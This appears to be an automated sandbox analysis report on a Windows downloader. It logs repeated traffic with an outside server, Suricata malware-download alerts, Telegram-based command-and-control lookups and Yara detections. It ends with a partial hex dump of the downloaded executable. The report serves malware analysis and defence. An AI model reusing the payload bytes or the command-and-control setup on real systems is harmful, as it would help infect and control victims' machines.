                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49163
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Thu, 26 Sep 2024 07:25:01 GMTContent-Type: application/x-msdos-programContent-Length: 704000Connection: keep-aliveLast-Modified: Thu, 26 Sep 2024 03:29:52 GMTETag: "abe00-622fd59fdddc0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 d4 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 98 0a 00 00 24 00 00 00 00 00 00 76 b6 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b6 0a 00 4f 00 00 00 00 c0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c 96 0a 00 00 20 00 00 00 98 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 20 00 00 00 c0 0a 00 00 22 00 00 00 9a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 b6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 59 00 00 5c 35 00 00 03 00 00 00 1e 00 00 06 2c 8f 00 00 f8 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 7c 00 00 00 00 00 00 00 02 28 15 00 00 0a 00 00 02 03 16 9a 28 16 00 00 0a 7d 08 00 00 04 02 02 7b 08 00 00 04 28 02 00 00 06 7d 01 00 00 04 02 03 17 9a 28 17 00 00 0a 7d 02 00 00 04 02 03 18 9a 28 17 00 00 0a 7d 04 00 00 04 02 03 19 9a 28 17 00 00 0a 7d 05 00 00 04 02 03 1a 9a 28 17 00 00 0a 7d 03 00 00 04 02 03 1b 9a 28 18 00 00 0a 7d 06 00 00 04 02 03 1c 9a 28 17 00 00 0a 7d 07 00 00 04 2a 13 30 02 00 21 00 00 00 01 00 00 11 00 0f 00 28 19 00 00 0a 20 6c 07 00 00 59 20 6d 01 00 00 5a 0f 00 28 1a 00 00 0a 58 0a 2b 00 06 2a 00 00 00 13 30 05 00 6d 01 00 00 02 00 00 11 02 73 1b 00 00 0a 7d 09 00 00 04 02 20 80 96 98 00 7d 0a 00 00 04 02 23 00 00 00 00 d0 12 63 41 7d 0b 00 00 04 02 20 80 69 67 ff 7d 0c 00 